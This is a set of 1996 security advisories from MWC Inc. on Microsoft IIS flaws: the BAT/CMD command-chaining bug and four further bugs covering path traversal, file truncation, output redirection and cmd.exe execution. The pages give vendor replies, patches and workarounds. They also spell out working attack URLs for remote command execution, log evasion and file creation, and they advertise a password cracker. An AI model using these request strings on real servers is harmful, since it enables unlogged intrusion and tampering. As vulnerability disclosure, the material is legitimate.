New! If you are running Windows NT or Windows 95 you can Test whether your connection to the internet is safe! Right Now. Microsoft Internet Information Server v 1.0 "BAT/CMD" Security Bug, Part I. 0. Abstract .bat and .cmd BUG is well-known in Netscape server and described in WWW security FAQ Q59. Implementation of this bug (undocumented remote administration feature) in MicroSoft IIS Web server beats the all top scores. 1. Default Configuration Let's consider fresh IIS Web server installation where all settings are default: 1) CGI directory is /scripts 2) There are no files abracadabra.bat or abracadabra.cmd in the /scripts directory. 3) IIS Web server maps .bat and .cmd extensions to cmd.exe. Therefore registry key HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap has the following string: .bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s 2. Attack In this case a hacker with a malicious intent can send either one of the two command lines to the server: a) /scripts/abracadabra.bat?&dir+c:\+?&time b) /scripts/abracadabra.cmd?&dir+c:\+?&time and the following happens: 1) Browser asks how you want to save a document. Notepad.exe or any other viewer would do for this "type" of application. 2) Browser starts the download session. The download window appears on the screen. 3) The hacker clicks the "cancel" button on the download window, because the "time" command on the server never terminates. 4) Nothing is logged on the server side by the IIS Web server, because the execution process was not successfully terminated!!! (Thanks to the "time" command.) The only way to see that something happened is to review all your NT security logs. But they do not contain information like REMOTE_IP. Thus the hacker's machine remains fully anonymous. 3. Resume 1) IIS Web server allows a hacker to execute his "batch file" by typing /scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN In a similar situation with the Netscape server, only single command can be executed. 2) There is no file abracadabra.bat in /scripts directory, but .bat extension is mapped to C:\WINNT35\System32\cmd.exe In a similar situation with the Netscape server, actual .bat file must exist. 3) In case a hacker enters a command like "time" or "date" as COMMAND[N], nothing will be logged by IIS Web server. In a similar situation with the Netscape server, the error log will have a record about remote IP and command you trying to execute. 4. Workaround Disable .BAT and .CMD file extensions for external CGI scripts in file mapping feature of IIS Web server. 5. Reply from MicroSoft We sent the description of this bug to MicroSoft. Here one can see their reply and acknowledgement. NOTE: We have studied MicroSoft bug "fix" and found out that the problem has not been fixed! If one uses a little bit more complicated command string, an arbitrary command on a server can be still effectively executed. And again, nothing will be logged by IIS. More information is available here . OTHER REFERENCES "BAT/CMD" Security Bug in IIS, Part I . "BAT/CMD" Security Bug in IIS, Part II . "4 - BUG" Alert: MS IIS, Netscape Alert . "4 - BUG" Report: MS IIS, Netscape Report . Windows NT Administrator's Password Recovery Program - PasswordNT ¨ Windows NT Password Cracker - ScanNT ¨ [NT and Net Security Services] 1996 © MWC Inc. -- Powered by OMNA ¨ Digital New! If you are running Windows NT or Windows 95 you can Test whether your connection to the internet is safe! Right Now. Microsoft Internet Information Server v 1.0 "BAT/CMD" Security Bug, Part II. 0. Abstract .bat and .cmd BUG for Microsoft Internet Information Server is described here . Microsoft claims to fix this problem. The patch is available from the Microsoft's site. We have studied this patch and found out that the problem has not been fixed! If one uses a little bit more complicated command string, an arbitrary command on a server can be still effectively executed. And again, nothing will be logged by IIS. 1. Default Configuration We will consider the following settings: 1) IIS Web server with the .bat/.cmd patch from Microsoft installed. (or IIS downloaded after March 5, 1996) 2) CGI directory is /scripts 3) Consider test.bat in the /scripts directory: @echo off echo Content-type: text/plain echo. echo Hello World! 4) IIS Web server maps .bat and .cmd extensions to cmd.exe. Therefore registry key HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap has the following string: .bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s 2. Attack In this case a hacker with a malicious intent can send this command line to the server: /scripts/test.bat+%26dir+%26time+%26abracadabra.exe with the results described in details previously . The good news is that now file test.bat must be actually present in scripts directory. 3. Resume As long as IIS does not log information about unsuccessful hits there are the ways for hackers to break your entire NT box. I don't want to discuss this matter in more details, but our network security partners recommend to avoid the usage of IIS because of an even more severe "purple security bug," which they recently have discovered in IIS. 4. Workaround Disable .BAT and .CMD file extensions for external CGI scripts in file mapping feature of IIS Web server or don't use .bat or .cmd files as a scripts. OTHER REFERENCES "BAT/CMD" Security Bug in IIS, Part I . "BAT/CMD" Security Bug in IIS, Part II . "4 - BUG" Alert: MS IIS, Netscape Alert . "4 - BUG" Report: MS IIS, Netscape Report . Windows NT Administrator's Password Recovery Program - PasswordNT ¨ Windows NT Password Cracker - ScanNT ¨ [NT and Net Security Services] 1996 © MWC Inc. -- Powered by OMNA ¨ Digital New! If you are running Windows NT or Windows 95 you can test whether your connection to the internet is safe Right Now! Microsoft Internet Information Server vv. 1.x, 2.0b New Security Bugs Alert. June 30, 1996 0. Abstract MWC, Inc. has discovered a new series of bugs ("4bugs") in the MS IIS in addition to the "BAT/CMD" bug Part I and Part II. 1. What these new bugs allow to do. The First bug allows a user to access any file on the same partition where your wwwroot directory exists (assuming that IIS_user has permission to read this file). It also allows execution of any executable file on the same partition where your scripts directory exists (assuming that IIS_user has permission to execute this file). If cmd.exe file can be executed then it also allows you to execute any command and read any file on any partition (assuming that IIS_user has permission to read or execute this file). This bug is similar (but not the same) as the one discovered independently by James@superstation.net. For more information and the ISAPI filter DLL that fixes the problem take a look at this page The Second and Third bugs exploit passing of unchecked arguments to the cmd.exe in a way similar to the "BAT/CMD" bug . These bugs allow you to create new or to modify existing files on any partition under the following conditions: BAT and (or) CMD files are mapped by IIS to the cmd.exe file IIS_USER has a right to create a file in case of a new file creation IIS_USER has a right to delete a file in case of a file modification Unfortunately Netscape Communication and Netscape Commerce servers have similar bugs. Similar things can be done with Netscape Server if it uses BAT or CMD files as CGI scripts. We did not test all Web servers available on the market. But some of them are vulnerable too. The Fourth bug is specific to the cmd.exe program. Once accessed (for example by exploiting the first bug) cmd.exe can be used to execute any internal command or any command on any partition, share, etc., or it can be used to create a new "custom made" file even if the mapping to the BAT, CMD files is disabled. 2. Alert MWC, Inc. has sent detailed bugs report to Microsoft. People at Microsoft we talked to are very concerned about their customers and thus the fixes from Microsoft should be available soon. MWC, Inc. has sent the report to Netscape as well. MWC, Inc. will send the copy of the report immediately to Every Web Server Developer Company to let them test whether their Web Server is vulnerable to the second and third bugs. MWC, Inc. will publish the detailed report about the bugs on July 3, 1996 at 10:00 pm EST at this URL. We believe that the delay between this alert and the actual bugs report publications will help Webmasters to reconfigure their websites before the information will be available to the general public. MWC, Inc. will send the report about the bugs by e-mail to all registered users on July 3, 1996 at 10:00 pm EST. Register on-line to receive your copy of report by e-mail. 3. Conclusions and Workaround Regardless of the Web server you are using, create separate partitions for your wwwroot directories and scripts directories to be on the safe side. Disable BAT/CMD files' mapping and never use BAT and (or) CMD files as CGI scripts. [NT and Net Security Services] 1996 © MWC -- Powered by OMNA Digital New! If you are running Windows NT or Windows 95 you can test whether your connection to the internet is safe! Right Now! Microsoft Internet Information Server vv. 1.x, 2.0b "4BUGs" Security Bugs REPORT. July 3, 1996 0. Abstract MWC, Inc. has discovered a new series of bugs in the MS IIS in addition to the "BAT/CMD" bug Part I and Part II. 1. The 4 Bugs [DOUBLE DOT] [TRUNCATE] [REDIRECT] [CMD.EXE] Ê Ê "DOUBLE DOT" Bug allows intruder to access any file on the same partition where your wwwroot directory is located (assuming that IIS_user has permission to read this file). It also allows intruder to execute any executable file on the same partition where your scripts directory is located (assuming that IIS_user has permission to execute this file). If cmd.exe file can be executed than it also allows intruder to execute any command and read any file on any partition (assuming that IIS_user has permission to read or execute this file). The command http://[domain_name]/..\..\..\..\[PATH]\filename allows intruder to download any file on the same partition where the wwwroot directory is located. The commands http://[domain_name]/scripts/../../../../[PATH]/filename or http://[domain_name]/scripts/..\..\..\..\[PATH]\filename allow intruder to execute any executable file on the same partition where your scripts are located. Note: This bug is similar (but not the same one) as discovered independently by James@superstation.net. For more information and the ISAPI filter DLL that fixes the problem take a look at this page Ê "TRUNCATE" Bug allows intruder to create new or to truncate existing files on any partition under the following conditions: BAT and (or) CMD files are mapped by IIS to the cmd.exe file IIS_USER has a right to create a file in case of a new file creation IIS_USER has a right to delete a file in case of a file modification The command http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename.bat will create a new file at the FULL_PATH drive:\directory location if the file FULL_PATH\filename.bat does not exist. If the file exists and IIS_USER has permission to delete this file, the file will be truncated. The command http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename%0A%0Dabracadabra.bat will create a new file at the FULL_PATH drive:\directory location if the file FULL_PATH\filename does not exist. If the file exists and IIS_USER has permission to delete this file, the file will be truncated. Note: File abracadabra.bat does not need to exist in the scripts directory. Ê "REDIRECT" Bug will redirect output from any CGI script to the file under the following conditions: BAT and (or) CMD files are mapped to the cmd.exe file by IIS IIS_USER has a right to create a file in case of a new file creation IIS_USER has a right to delete a file in case of a file modification The commands http://[domain_name]/scripts/script_nameFULL_PATH\filename%0A%0Dabracadabra.bat or http://[domain_name]/scripts/script_name>FULL_PATH\filename%0A%0Dabracadabra.bat will redirect (or append) output from the existing script_name to the filename file at the FULL_PATH (drive:\directory) location. Note: Netscape Communication and Netscape Commerce servers have similar bugs. Similar things can be done with the Netscape Server when using the BAT/CMD files as a CGI scripts. We did not test all Web servers available on the market. But some of them are vulnerable too. The commands http://[domain_name]/scripts/script.bat?>FULL_PATH\filename or http://[domain_name]/scripts/script.bat?>>FULL_PATH\filename will redirect (or append) output from the existing script_name to the filename file at the FULL_PATH (drive:\directory) location. The bug is probably more dangerous in this case because the Netscape Server runs by default under local system account. Intruder can also use a "|" symbol under the Netscape server to transfer output from an existing BAT to every executable in any partition. Ê "CMD.EXE" Bug is specific to the cmd.exe shell program. Once accessed (for example by exploiting Double Dot bug) cmd.exe can be used to execute any internal command or any command in any partition, it can be used to create a new "custom made" file even if the mapping to the BAT/CMD files is disabled. The commands: http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command or http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename or http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename will execute any internal command and redirect or append the output from the command to a file. In particular, the command: http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat will create a file c:\temp\hello.bat containing the phrase "hello, World". This allows a malicious user to create simple but dangerous files. For example these files can be used as scripts for ftp.exe command. This potentially allows anybody to cause the ftp client on the server to connect to the intruder's ftp server, download trojan horse programs etc. 2. Alert MWC, Inc. has sent detailed bugs report to Microsoft. The people at Microsoft we talked to are very concerned about their customers and thus the patches from Microsoft should be available soon. MWC, Inc. has sent the report to Netscape as well. MWC, Inc. will send a copy of the report immediately to any web server developer company to let them test whether their Web Server vulnerable to the mentioned above bugs. 3. Conclusions and Workaround Regardless of the web server you are using, create separate partitions for your wwwroot directories and scripts directories to be on the safe side. Disable BAT/CMD files' mapping and never use BAT/CMD files as CGI scripts. The real danger of the discovered bugs can not be underestimated. We demonstrated by Simulated Intrusion Attack on a test computer at Windows NT Magazine lab that combination of the bugs can completely void the security of an NT domain. Information about the SIA test is scheduled for publication in one of the upcoming issues of WinNT Magazine. 4. The Patch According to reply from Microsoft, the patch for these bugs is now available at: http://www.microsoft.com/infoserv/iisservpack.htm [NT and Net Security Services] 1996 © MWC -- Powered by OMNA Digital